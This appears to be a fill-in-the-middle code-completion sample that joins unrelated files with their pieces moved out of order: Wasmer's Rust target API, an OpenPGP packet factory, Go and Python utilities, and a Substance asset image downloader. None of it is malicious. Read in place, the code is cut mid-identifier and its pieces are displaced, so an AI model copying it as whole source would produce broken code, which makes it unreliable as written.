}).$mount('#app') | Vue.component(Image.name, Image)
Vue.component(Music.name, Music)
Vue.component(Rect.name, Rect)
Vue.component(Text.name, Text) |
target_lexicon.rs | //! Unstable non-standard Wasmer-specific API that contains everything
//! to create a target with a triple and CPU features.
//!
//! This is useful for cross-compilation.
//!
//! # Example
//!
//! ```rust
//! # use inline_c::assert_c;
//! # fn main() {
//! # (assert_c! {
//! # #include "tests/wasmer.h"
//! #
//! int main() {
//! // Declare the target triple.
//! wasmer_triple_t* triple;
//!
//! {
//! wasm_name_t triple_name;
//! wasm_name_new_from_string(&triple_name, "x86_64-apple-darwin");
//!
//! triple = wasmer_triple_new(&triple_name);
//!
//! wasm_name_delete(&triple_name);
//! }
//!
//! assert(triple);
//!
//! // Declare the target CPU features.
//! wasmer_cpu_features_t* cpu_features = wasmer_cpu_features_new();
//!
//! {
//! wasm_name_t cpu_feature_name;
//! wasm_name_new_from_string(&cpu_feature_name, "sse2");
//!
//! wasmer_cpu_features_add(cpu_features, &cpu_feature_name);
//!
//! wasm_name_delete(&cpu_feature_name);
//! }
//!
//! assert(cpu_features);
//!
//! // Create the target!
//! wasmer_target_t* target = wasmer_target_new(triple, cpu_features);
//! assert(target);
//!
//! wasmer_target_delete(target);
//!
//! return 0;
//! }
//! # })
//! # .success();
//! # }
//! ```
use super::super::types::wasm_name_t;
use crate::error::CApiError;
use enumset::EnumSet;
use std::slice;
use std::str::{self, FromStr};
use wasmer::{CpuFeature, Target, Triple};
/// Unstable non-standard Wasmer-specific API to represent a triple +
/// CPU features pair.
///
/// # Example
///
/// See the module's documentation.
#[derive(Debug)]
#[allow(non_camel_case_types)]
pub struct wasmer_target_t {
pub(crate) inner: Target,
}
/// Creates a new [`wasmer_target_t`].
///
/// It takes ownership of `triple` and `cpu_features`.
///
/// # Example
///
/// See the module's documentation.
#[no_mangle]
pub extern "C" fn wasmer_target_new(
triple: Option<Box<wasmer_triple_t>>,
cpu_features: Option<Box<wasmer_cpu_features_t>>,
) -> Option<Box<wasmer_target_t>> {
let triple = triple?;
let cpu_features = cpu_features?;
Some(Box::new(wasmer_target_t {
inner: Target::new(triple.inner.clone(), cpu_features.inner.clone()),
}))
}
/// Delete a [`wasmer_target_t`].
///
/// # Example
///
/// See the module's documentation.
#[no_mangle]
pub extern "C" fn wasmer_target_delete(_target: Option<Box<wasmer_target_t>>) {}
/// Unstable non-standard Wasmer-specific API to represent a target
/// “triple”.
///
/// Historically such things had three fields, though they have added
/// additional fields over time.
///
/// # Example
///
/// ```rust
/// # use inline_c::assert_c;
/// # fn main() {
/// # (assert_c! {
/// # #include "tests/wasmer.h"
/// #
/// int main() {
/// wasm_name_t triple_name;
/// wasm_name_new_from_string(&triple_name, "x86_64-apple-darwin");
///
/// wasmer_triple_t* triple = wasmer_triple_new(&triple_name);
/// assert(triple);
///
/// wasmer_triple_delete(triple);
/// wasm_name_delete(&triple_name);
///
/// return 0;
/// }
/// # })
/// # .success();
/// # }
/// ```
///
/// See also [`wasmer_triple_new_from_host`].
#[allow(non_camel_case_types)]
pub struct wasmer_triple_t {
inner: Triple,
}
/// Create a new [`wasmer_triple_t`] based on a triple string.
///
/// # Example
///
/// See [`wasmer_triple_t`] or [`wasmer_triple_new_from_host`].
#[no_mangle]
pub unsafe extern "C" fn wasm | triple: Option<&wasm_name_t>,
) -> Option<Box<wasmer_triple_t>> {
let triple = triple?;
let triple = c_try!(str::from_utf8(slice::from_raw_parts(
triple.data,
triple.size
)));
Some(Box::new(wasmer_triple_t {
inner: c_try!(Triple::from_str(triple).map_err(|e| CApiError { msg: e.to_string() })),
}))
}
/// Create the [`wasmer_triple_t`] for the current host.
///
/// # Example
///
/// ```rust
/// # use inline_c::assert_c;
/// # fn main() {
/// # (assert_c! {
/// # #include "tests/wasmer.h"
/// #
/// int main() {
/// wasmer_triple_t* triple = wasmer_triple_new_from_host();
/// assert(triple);
///
/// wasmer_triple_delete(triple);
///
/// return 0;
/// }
/// # })
/// # .success();
/// # }
/// ```
///
/// See also [`wasmer_triple_new`].
#[no_mangle]
pub extern "C" fn wasmer_triple_new_from_host() -> Box<wasmer_triple_t> {
Box::new(wasmer_triple_t {
inner: Triple::host(),
})
}
/// Delete a [`wasmer_triple_t`].
///
/// # Example
///
/// See [`wasmer_triple_t`].
#[no_mangle]
pub extern "C" fn wasmer_triple_delete(_triple: Option<Box<wasmer_triple_t>>) {}
/// Unstable non-standard Wasmer-specific API to represent a set of
/// CPU features.
///
/// CPU features are identified by their stringified names. The
/// reference is the GCC options:
///
/// * <https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html>,
/// * <https://gcc.gnu.org/onlinedocs/gcc/ARM-Options.html>,
/// * <https://gcc.gnu.org/onlinedocs/gcc/AArch64-Options.html>.
///
/// At the time of writing this documentation (it might be outdated in
/// the future), the supported features are the following:
///
/// * `sse2`,
/// * `sse3`,
/// * `ssse3`,
/// * `sse4.1`,
/// * `sse4.2`,
/// * `popcnt`,
/// * `avx`,
/// * `bmi`,
/// * `bmi2`,
/// * `avx2`,
/// * `avx512dq`,
/// * `avx512vl`,
/// * `lzcnt`.
///
/// # Example
///
/// ```rust
/// # use inline_c::assert_c;
/// # fn main() {
/// # (assert_c! {
/// # #include "tests/wasmer.h"
/// #
/// int main() {
/// // Create a new CPU feature set.
/// wasmer_cpu_features_t* cpu_features = wasmer_cpu_features_new();
///
/// // Create a new feature name, here `sse2`, and add it to the set.
/// {
/// wasm_name_t cpu_feature_name;
/// wasm_name_new_from_string(&cpu_feature_name, "sse2");
///
/// wasmer_cpu_features_add(cpu_features, &cpu_feature_name);
///
/// wasm_name_delete(&cpu_feature_name);
/// }
///
/// wasmer_cpu_features_delete(cpu_features);
///
/// return 0;
/// }
/// # })
/// # .success();
/// # }
/// ```
#[allow(non_camel_case_types)]
pub struct wasmer_cpu_features_t {
inner: EnumSet<CpuFeature>,
}
/// Create a new [`wasmer_cpu_features_t`].
///
/// # Example
///
/// See [`wasmer_cpu_features_t`].
#[no_mangle]
pub extern "C" fn wasmer_cpu_features_new() -> Box<wasmer_cpu_features_t> {
Box::new(wasmer_cpu_features_t {
inner: CpuFeature::set(),
})
}
/// Delete a [`wasmer_cpu_features_t`].
///
/// # Example
///
/// See [`wasmer_cpu_features_t`].
#[no_mangle]
pub extern "C" fn wasmer_cpu_features_delete(_cpu_features: Option<Box<wasmer_cpu_features_t>>) {}
/// Add a new CPU feature into the set represented by
/// [`wasmer_cpu_features_t`].
///
/// # Example
///
/// See [`wasmer_cpu_features_t`].
#[no_mangle]
pub unsafe extern "C" fn wasmer_cpu_features_add(
cpu_features: Option<&mut wasmer_cpu_features_t>,
feature: Option<&wasm_name_t>,
) -> bool {
let cpu_features = match cpu_features {
Some(cpu_features) => cpu_features,
_ => return false,
};
let feature = match feature {
Some(feature) => feature,
_ => return false,
};
let feature = c_try!(
str::from_utf8(slice::from_raw_parts(
feature.data,
feature.size,
));
otherwise false
);
cpu_features.inner.insert(c_try!(
CpuFeature::from_str(feature);
otherwise false
));
true
}
| er_triple_new(
|
factory.js | /**
* @license
* Copyright 2012 Google Inc. All rights reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @fileoverview Generates packets from a ByteArray.
* @author [email protected] (Eduardo Vela)
*/
goog.provide('e2e.openpgp.packet.factory');
goog.require('e2e.openpgp.error.ParseError');
/**
* Dictionary of parsers for specific Packet types. The keys are the packet
* tags.
* @type {!Object.<number,
* function(!e2e.ByteArray):!e2e.openpgp.packet.Packet>}
* @private
*/
e2e.openpgp.packet.factory.parsers_ = {};
|
/**
* Registers a Packet as the default parser for a tag.
* @param {function(new:e2e.openpgp.packet.Packet, ...)} packet The
* constructor of the packet.
* @suppress {missingProperties} go/missingfnprops
*/
e2e.openpgp.packet.factory.add = function(packet) {
e2e.openpgp.packet.factory.parsers_[packet.prototype.tag] =
packet.parse;
};
/**
* Parses a packet of the given tag and returns it.
* Throws a `e2e.openpgp.error.ParseError` for nonexistent packets.
* @param {number} tag The tag to generate a packet for.
* @param {!e2e.ByteArray} body The body of the packet.
* @return {!e2e.openpgp.packet.Packet} The packet.
*/
e2e.openpgp.packet.factory.parse = function(tag, body) {
if (e2e.openpgp.packet.factory.parsers_.hasOwnProperty(tag)) {
return e2e.openpgp.packet.factory.parsers_[tag](body);
}
throw new e2e.openpgp.error.ParseError(
'Can not parse packet with tag ' + tag + '.');
}; | |
maths.py |
def bindata(data, maxbins = 30, reduction = 0.1):
| '''
data must be numeric list with a len above 20
This function counts the number of data points in a reduced array
'''
tole = 0.01
N = len(data)
assert N > 20
vmin = min(data)
vmax = max(data)
DV = vmax - vmin
tol = tole*DV
vmax += tol
if vmin >= 0:
vmin -= tol
vmin = max(0.0,vmin)
else:
vmin -= tol
n = min(maxbins,max(2,int(round(reduction*N))))
DV = vmax - vmin
bbin = npy.linspace(vmin,vmax,n+1)
sso = npy.searchsorted(bbin,npy.sort(data))
x = []
y = []
for i in range(0,n):
x.append(0.5*(bbin[i+1]+bbin[i]))
y.append(0.0)
dy = 1.0/N
for i in sso:
y[i-1] += dy/(bbin[i]-bbin[i-1])
return (x,y) |
|
navbar.component.ts | import { Component } from '@angular/core';
/**
* This class represents the navigation bar component.
*/
@Component({
moduleId: module.id,
selector: 'sd-navbar',
templateUrl: 'navbar.component.html',
styleUrls: ['navbar.component.css'],
})
export class | { }
| NavbarComponent |
litconv.go | //Copyright 2013 Vastech SA (PTY) LTD
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package util
import (
"fmt"
"strconv"
"unicode"
"unicode/utf8"
)
/* Interface */
func LitToRune(lit []byte) rune {
if lit[1] == '\\' {
return escapeCharVal(lit)
}
r, size := utf8.DecodeRune(lit[1:])
if size != len(lit)-2 {
panic(fmt.Sprintf("Error decoding rune. Lit: %s, rune: %d, size%d\n", lit, r, size))
}
return r
}
func IntValue(lit []byte) (int64, error) {
return strconv.ParseInt(string(lit), 10, 64)
}
func UintValue(lit []byte) (uint64, error) {
return strconv.ParseUint(string(lit), 10, 64)
}
/* Util */
func escapeCharVal(lit []byte) rune |
func digitVal(ch rune) int {
switch {
case '0' <= ch && ch <= '9':
return int(ch) - '0'
case 'a' <= ch && ch <= 'f':
return int(ch) - 'a' + 10
case 'A' <= ch && ch <= 'F':
return int(ch) - 'A' + 10
}
return 16 // larger than any legal digit val
}
| {
var i, base, max uint32
offset := 2
switch lit[offset] {
case 'a':
return '\a'
case 'b':
return '\b'
case 'f':
return '\f'
case 'n':
return '\n'
case 'r':
return '\r'
case 't':
return '\t'
case 'v':
return '\v'
case '\\':
return '\\'
case '\'':
return '\''
case '0', '1', '2', '3', '4', '5', '6', '7':
i, base, max = 3, 8, 255
case 'x':
i, base, max = 2, 16, 255
offset++
case 'u':
i, base, max = 4, 16, unicode.MaxRune
offset++
case 'U':
i, base, max = 8, 16, unicode.MaxRune
offset++
default:
panic(fmt.Sprintf("Error decoding character literal: %s\n", lit))
}
var x uint32
for ; i > 0 && offset < len(lit)-1; i-- {
ch, size := utf8.DecodeRune(lit[offset:])
offset += size
d := uint32(digitVal(ch))
if d >= base {
panic(fmt.Sprintf("charVal(%s): illegal character (%c) in escape sequence. size=%d, offset=%d", lit, ch, size, offset))
}
x = x*base + d
}
if x > max || 0xD800 <= x && x < 0xE000 {
panic(fmt.Sprintf("Error decoding escape char value. Lit:%s, offset:%d, escape sequence is invalid Unicode code point\n", lit, offset))
}
return rune(x)
} |
substance_assets_image_downloader.py | """
Downloading images scrapped from the https://substance3d.adobe.com/assets/allassets
and saved in local SQLite file
"""
import os
import time
import sys
import platform
from os import path
import requests # to get image from the web
import shutil # to save it locally
from rich import pretty
from rich.console import Console
from rich.traceback import install
from rich.progress import track
from common_database_access import CommonDatabaseAccess
import f_icon
from pathlib import Path
console = Console()
pretty.install()
install() # this is for tracing project activity
global_data = {"version": "Beta 1.2 (22.01.2022)\n"}
def clear_console():
"""Clears console view"""
command = "clear"
if os.name in ("nt", "dos"): # If Machine is running on Windows, use cls
command = "cls"
os.system(command)
def download_image(url, file_path):
if not path.exists(file_path):
r = requests.get(url, stream=True)
# Set decode_content value to True, otherwise the downloaded image file's size will be zero.
r.raw.decode_content = True
# Open a local file with wb ( write binary ) permission.
with open(file_path, "wb") as f:
shutil.copyfileobj(r.raw, f)
def append_date(filename):
"""adds date to the end of the filename
:param str filename: filename
:return:
"""
p = Path(filename)
return "{0}_{2}{1}".format(
Path.joinpath(p.parent, p.stem), p.suffix, time.strftime("%Y%m%d-%H%M%S")
)
def check_for_download(url, file_path, need_to_refresh):
# console.print(url)
if url:
if os.path.exists(file_path) and need_to_refresh:
os.rename(file_path, append_date(file_path))
download_image(url, file_path)
def convert_to_nice_name(filename) -> str:
"""
Replaces _ with spaces in filename
:param str filename: filename to convert
:return:
"""
return filename.replace("_", " ")
def | (filename) -> str:
"""
Replaces space with _ in filename
:param str filename: filename to convert
:return:
"""
return filename.replace(" ", "_")
def create_folder_for_type(database, asset_types):
# 1. create _source folder for files to move to their location
if not os.path.exists(
global_data["local_path"] + os.sep + global_data["source_path"]
):
os.makedirs(global_data["local_path"] + os.sep + global_data["source_path"])
# 2. Now creating rest of the folders
console.print("Creating folders ...")
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
os.makedirs(global_data["local_path"] + os.sep + a["name"])
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
os.makedirs(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
)
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if not os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
os.makedirs(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
)
input("Press any enter to close...")
def create_folders(database):
menu_title = " Select asset type to create folder"
count = 1
menu_items = []
all_asset_types = database.get_all_asset_types()
for asset_type in all_asset_types:
menu_items.append(f"[{count}] {asset_type['name']}")
count = count + 1
menu_items.append(f"[{count}] All")
count = count + 1
menu_items.append(f"[{count}] Return")
menu_exit = False
while not menu_exit:
# cls()
clear_console()
console.print("version " + global_data["version"])
console.print(menu_title + "")
for m_i in menu_items:
console.print(m_i + "")
console.print("")
user_input = input("Enter a number: ")
if user_input.isnumeric():
menu_sel = int(user_input)
if 1 <= menu_sel < count - 1: # Specific asset type
# categories = database.get_all_categories_by_asset_type_id(
# all_asset_types[menu_sel - 1]["id"]
# )
create_folder_for_type(database, [all_asset_types[menu_sel - 1]])
elif menu_sel == count - 1: # all asset types
# categories = database.get_all_categories_by_id(14)
# categories = database.get_all_categories()
create_folder_for_type(database, all_asset_types)
elif menu_sel == count: # Quit
menu_exit = True
def download_all_images(database):
console.print("Downloading images ...")
asset_types = database.get_all_asset_types()
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
# console.print(asset)
check_for_download(
asset["preview_image"],
local_path + "Preview.png",
asset["have_preview_image_changed"],
)
check_for_download(
asset["details_image"],
local_path + "Details.png",
asset["have_details_image_changed"],
)
check_for_download(
asset["variant_1_image"],
local_path + "Variant1.png",
asset["have_variant_1_image_changed"],
)
check_for_download(
asset["variant_2_image"],
local_path + "Variant2.png",
asset["have_variant_2_image_changed"],
)
check_for_download(
asset["variant_3_image"],
local_path + "Variant3.png",
asset["have_variant_3_image_changed"],
)
database.set_asset_art_as_updated(asset["id"])
input("Press any enter to close...")
def make_all_icons(database, ignore_created=True):
console.print("Creating folder icons ...")
asset_types = database.get_all_asset_types()
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
# console.print(asset)
if platform.system() == "Windows":
if os.path.exists(local_path + "Preview.png") and (
not os.path.exists(local_path + "Preview.ico")
or ignore_created
):
f_icon.create_icon(local_path + "Preview.png")
else:
if os.path.exists(local_path + "Preview.png"):
f_icon.create_icon(local_path + "Preview.png")
input("Press any enter to close...")
def transfer_all_local_files(database):
console.print("Placing files in corresponding folders ...")
files = os.listdir(global_data["local_path"] + os.sep + global_data["source_path"])
asset_types = database.get_all_asset_types()
placement_log = {"moved": [], "existing": [], "missing": [], "existing_full": []}
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
for (
f
) in (
files
): # going over all files in the _source folder that we know from the start
if os.path.exists( # checking, that file is still there. can be moved already
global_data["local_path"]
+ os.sep
+ global_data["source_path"]
+ os.sep
+ f
):
if not os.path.exists( # checking, that this file already exists at destination.
global_data[
"local_path"
] # if it is, then we have a double
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
):
if (
f.lower().endswith(".jpg")
and convert_to_nice_name(f.lower()).find(
asset["name"].lower()
)
>= 0
):
# if it is jpeg, then extra case. We check if asset name is inside file name
os.rename(
global_data["local_path"]
+ os.sep
+ global_data["source_path"]
+ os.sep
+ f,
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f,
)
placement_log["moved"].append(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
)
elif not f.lower().endswith(
".jpg"
): # if this is not a jpg, then we check name
# without extension to match with asset name
file_details = os.path.splitext(f)
if (
convert_to_nice_name(file_details[0].lower())
== asset["name"].lower()
):
os.rename(
global_data["local_path"]
+ os.sep
+ global_data["source_path"]
+ os.sep
+ f,
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f,
)
placement_log["moved"].append(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
)
else: # we had a double name, so mark it as double
placement_log["existing_full"].append(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
)
placement_log["existing"].append(f)
# generating report
files = os.listdir(global_data["local_path"] + os.sep + global_data["source_path"])
placement_log["missing"] = list(set(files) - set(placement_log["existing"]))
file = open(
append_date(global_data["local_path"] + os.sep + "FileTransferReport.txt"),
"w",
encoding="utf-8",
)
file.write(f'Moved files({len(placement_log["moved"])}): \n')
file.write("\n")
for f in placement_log["moved"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Existed files({len(placement_log["existing_full"])}): \n')
file.write("\n")
for f in placement_log["existing_full"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Missing locations for files({len(placement_log["missing"])}): \n')
file.write("\n")
for f in placement_log["missing"]:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def generate_detail_report(database):
console.print("Generating detail report ...")
asset_types = database.get_all_asset_types()
placement_log = {"have": [], "missing": [], "need": []}
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
count = 0
have = 0
missing = ""
if asset["format_sbsar"]:
count = count + 1
if asset["have_format_sbsar"]:
have = have + 1
else:
missing = missing + "sbsar "
changed_record = True
if asset["format_sbs"]:
count = count + 1
if asset["have_format_sbs"]:
have = have + 1
else:
missing = missing + "sbs "
if asset["format_exr"]:
count = count + 1
if asset["have_format_exr"]:
have = have + 1
else:
missing = missing + "exr "
if asset["format_fbx"]:
count = count + 1
if asset["have_format_fbx"]:
have = have + 1
else:
missing = missing + "fbx "
if asset["format_glb"]:
count = count + 1
if asset["have_format_glb"]:
have = have + 1
else:
missing = missing + "glb "
if asset["format_mdl"]:
count = count + 1
if asset["have_format_mdl"]:
have = have + 1
else:
missing = missing + "mdl "
if count == have:
placement_log["have"].append(
a["name"] + " > " + c["name"] + " > " + asset["name"]
)
elif count != have and have > 0:
placement_log["missing"].append(
a["name"]
+ " > "
+ c["name"]
+ " > "
+ asset["name"]
+ " : missing formats "
+ missing
)
else:
placement_log["need"].append(
a["name"] + " > " + c["name"] + " > " + asset["name"]
)
file = open(
append_date(global_data["local_path"] + os.sep + "AssetDetailsCountReport.txt"),
"w",
encoding="utf-8",
)
file.write(f'Have assets({len(placement_log["have"])}): \n')
file.write("\n")
for f in placement_log["have"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Missing assets({len(placement_log["missing"])}): \n')
file.write("\n")
for f in placement_log["missing"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Needed assets({len(placement_log["need"])}): \n')
file.write("\n")
for f in placement_log["need"]:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def generate_folder_report(database):
console.print("Generating folder report ...")
asset_types = database.get_all_asset_types()
placement_log = []
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
# if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
# continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
# if not os.path.exists(
# global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
# ):
# continue
console.print(f"{a['name']} - {c['name']}")
have = 0
missing = 0
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
have = have + 1
else:
missing = missing + 1
placement_log.append(f"{a['name']} - {c['name']} (Have {have}; Missing {missing})")
file = open(
append_date(global_data["local_path"] + os.sep + "AssetFolderCountReport.txt"),
"w",
encoding="utf-8",
)
for f in placement_log:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def mark_database_with_my_files(database):
console.print("Checking local files for the database ...")
asset_types = database.get_all_asset_types()
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
all_files = []
for lp, currentDirectory, files in os.walk(local_path):
all_files.extend(files)
asset["have_format_sbsar"] = False
asset["have_format_sbs"] = False
asset["have_format_exr"] = False
asset["have_format_fbx"] = False
asset["have_format_glb"] = False
asset["have_format_mdl"] = False
for file in all_files:
if file.lower().endswith(".sbsar") and asset["format_sbsar"]:
asset["have_format_sbsar"] = True
if file.lower().endswith(".sbs") and asset["format_sbs"]:
asset["have_format_sbs"] = True
if file.lower().endswith(".exr") and asset["format_exr"]:
asset["have_format_exr"] = True
if file.lower().endswith(".fbx") and asset["format_fbx"]:
asset["have_format_fbx"] = True
if file.lower().endswith(".glb") and asset["format_glb"]:
asset["have_format_glb"] = True
if file.lower().endswith(".mdl") and asset["format_mdl"]:
asset["have_format_mdl"] = True
database.update_asset(asset)
input("Press any enter to close...")
def fancy_list_generation(database):
console.print("Generating request list ...")
fancy_requests = []
if os.path.exists(global_data["local_path"] + os.sep + "Requests.txt"):
with open(global_data["local_path"] + os.sep + "Requests.txt") as f:
base_requests = f.read().splitlines()
for base_r in track(
base_requests, description="Requests.", total=len(base_requests)
):
asset = database.get_asset_by_name(base_r)
if len(asset) > 0:
asset_format = ""
if asset[0]["format_sbsar"]:
asset_format = asset_format + "sbsar "
if asset[0]["format_sbs"]:
asset_format = asset_format + "sbs "
if asset[0]["format_exr"]:
asset_format = asset_format + "exr "
if asset[0]["format_fbx"]:
asset_format = asset_format + "cbx "
if asset[0]["format_glb"]:
asset_format = asset_format + "glb "
if asset[0]["format_mdl"]:
asset_format = asset_format + "mdl "
fancy_requests.append(
asset[0]["name"]
+ " - "
+ asset_format.strip()
+ " - "
+ asset[0]["url"]
)
if len(fancy_requests) > 0:
file = open(
append_date(global_data["local_path"] + os.sep + "Result.txt"),
"w",
encoding="utf-8",
)
for f in fancy_requests:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def move_folders_to_new_category(database):
"""
Checks if asset folder do not exist at category location, then looks in every category
for the asset to relocate to the proper location
:param CommonDatabaseAccess database: reference to the database
"""
console.print("Generating report ...")
asset_types = database.get_all_asset_types()
all_categories = database.get_all_categories()
log = []
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
# if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
# continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
# if not os.path.exists(
# global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
# ):
# continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
expected_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
)
if not os.path.exists(expected_path):
# we did not find our asset in the right place, so we check everywhere
found = False
for a1 in asset_types:
for c1 in all_categories:
checked_path = (
global_data["local_path"]
+ os.sep
+ a1["name"]
+ os.sep
+ c1["name"]
+ os.sep
+ asset["name"]
)
if checked_path != expected_path and os.path.exists(
checked_path
):
log.append(checked_path + " >> " + expected_path)
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
os.makedirs(global_data["local_path"] + os.sep + a["name"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
os.makedirs(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
)
os.rename(checked_path, expected_path)
found = True
break
if found:
break
console.print("Moved Assets - " + str(len(log)))
console.print()
console.print("All Done !!!")
if len(log) > 0:
file = open(
append_date(
global_data["local_path"] + os.sep + "AssetCategoryChangeLog.txt"
),
"w",
encoding="utf-8",
)
for f in log:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def main_menu(database):
"""
Draw main menu
:param CommonDatabaseAccess database: reference to the database
:return:
"""
menu_title = " Select action"
menu_items = [
"[1] Create folders.",
"[2] Download all images.",
"[3] Make all icons. Where Preview.ico do not exist.",
"[4] Make all icons, but ignore where Preview.ico exists.",
"[5] Transfer all local files from _source folder to appropriate folders.",
"[6] Mark database with my files. (Do this before Generating report).",
"[7] Generate all folder report. (Do this after Marking database with my files).",
